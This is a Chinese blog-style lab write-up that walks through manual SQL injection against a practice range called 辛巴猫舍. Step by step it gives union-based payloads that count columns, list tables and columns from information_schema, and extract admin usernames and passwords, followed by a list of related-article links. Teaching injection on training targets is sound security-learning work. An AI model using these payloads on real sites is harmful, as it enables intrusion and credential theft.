通过SQL手工注入拿到管理员密码--辛巴猫舍
通过SQL手工注入拿到管理员密码–辛巴猫舍
靶场地址: http://rhiq8003.ia.aqlab.cn/
点击新闻页面看看
域名后面加上了id=1,说明存在着数据库的交互
那么这里就很有可能是注入点
把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1
进入手工注入步骤
第一步 判断是否存在SQL注入漏洞
构造and 1=1,这个语句是恒成立的,一般页面都是不报错的
再来试试1=2
出错,初步说明存在着注入漏洞
第二步 判断数据库字段数
在这里会使用到order by() 函数,它会根据后面的参数来改变排序顺序,比如数据库里有多个列,根据选取的列明,id,name,来排序
构造?id=1 and 1=1 order by 1 页面没有变化(order by 1表示根据第一列来排序,一般也是如此默认升序的)
再来依次构造order by 2 / order by 3
由MySQL的语法有,order by后面的数据超过列数后将会报错,因此用种方法来判断一共有几个字段
当进行到order by 3 后,页面显示错误,因此判断一共只有两个字段
第三步 判断回显点
回显点就是在页面中能显示数据库信息的板块,比如有的网页中“浏览次数”“发布时间”等,都反应的是数据库中的数据
于是我们使用联合查询
我们同时查询这两个数据
但要注意的是,在MySQL语句中,页面一次只能显示一行查询的内容,而且是先查后显示,于是我们需要让前面的语句?id=1 and 1=1这句话失效,从而显示union select 1,2的内容
因此我们让前一个命令报错无法显示,即构造?id=1 and 1=2,后面照常union select 1,2
这样就完全没用
必须构造1=2
找到了回显点2
第四步 查询相关内容
1.查询表
已知2为回显点,我们只需要在联合查询时将2替代为我们想要查询到部位名称即可
可以查询当前的数据库名,将2替换为database()
构造id=1 and 1=2 union select 1,database()
数据库名为maoshe
查询当前数据库 表名
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
(tips:group_concat()函数是将查询结果放到同一行)
查询到的数据库名为admin,dirs,news,xss
一般关于管理员的信息都在admin表中
2.查询字段名
查询admin表的列名
构造 ?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’
第一列是id,第二列是username,第三列是password
该有的信息都找到了,直接查询就行了
3.查询字段内容
构造 ?id=1 and 1=2 union select 1,group_concat(username) from admin
查询登陆用户名
构造 ?id=1 and 1=2 union select 1,group_concat(password) from admin
查询密码
通过SQL手工注入拿到管理员密码--辛巴猫舍相关推荐
- SQL注入靶场:辛巴猫舍
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:i ...
- SQL手工注入原理万能密码及默认密码登陆后台
SQL手工注入原理: 下面就是比较笨的方法了== 一个一个试 (* ̄rǒ ̄) 针对于.asp后缀网 + ?id_ 在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...
- python sql注入脚本_python辅助sql手工注入猜解数据库案例分析
发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...
- 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...
- 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...
- SQL手工注入漏洞测试(Oracle数据库)
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...
- Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...
- 墨者学院SQL手工注入靶场漏洞详解
墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...
- 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...
最新文章
- linux 下修改文件描述符限制
- EMC NetWorker恢复oracle指南
- RabbitMQ 的引言
- server2008R2平台部署exchange2010
- D - Delete Prime Gym - 102875D
- mysql无法启动如何备份文件_mysql 5.7 停电导致无法启动、如何备份数据,重新安装mysql...
- Flutter项目实战教程分享、基础使用、性能优化、每日积累
- 菜鸟学习笔记:Java提升篇8(线程2——线程的基本信息、线程安全、死锁、生产者消费者模式、任务调度)
- elasticsearch的一个bug总结
- 支持magento扩展性的几个特性
- oracle服务端导出/导入方式expdp/impdp
- 5分钟内快速上手掌握springtx事务以及注解的使用
- 回顾IDEA全局搜索快捷键
- 无法找到资源编辑器dll
- java解析marc乱码_国际C语言乱码大赛(IOCCC)的一个经典作品
- 汇编/源操作数/目的操作数
- 苹果企业级开发者账号申请详解
- java调用opencc将中文简体繁体转换
- 微分中值定理——(罗尔定理、拉格朗日定理、导数极限定理、达布定理、柯西定理)
- 奥维奥:新零售下,家具家居该如何乘风破浪?
热门文章
- 优秀的领导与糟糕的领导
- Python学习笔记(二)情侣关系的典范——————字典
- Python 的诞生与应用
- 基于Go语言Beego+Layui实现的毕业设计神器
- Lua + Redis 优惠券领券设计
- 【Java】爬虫,能不能再详细讲讲?万字长文送给你!
- Sublime Text 最新注册码
- [掌心网]苹果iPhone开发者的Windows Phone 7使用报告
- XposedInstaller框架未安装解决方法-ADB shell 离线安装-2023年-安卓 Android 6
- java调用asmx接口_java调用.net写的webserver接口(.asmx后缀)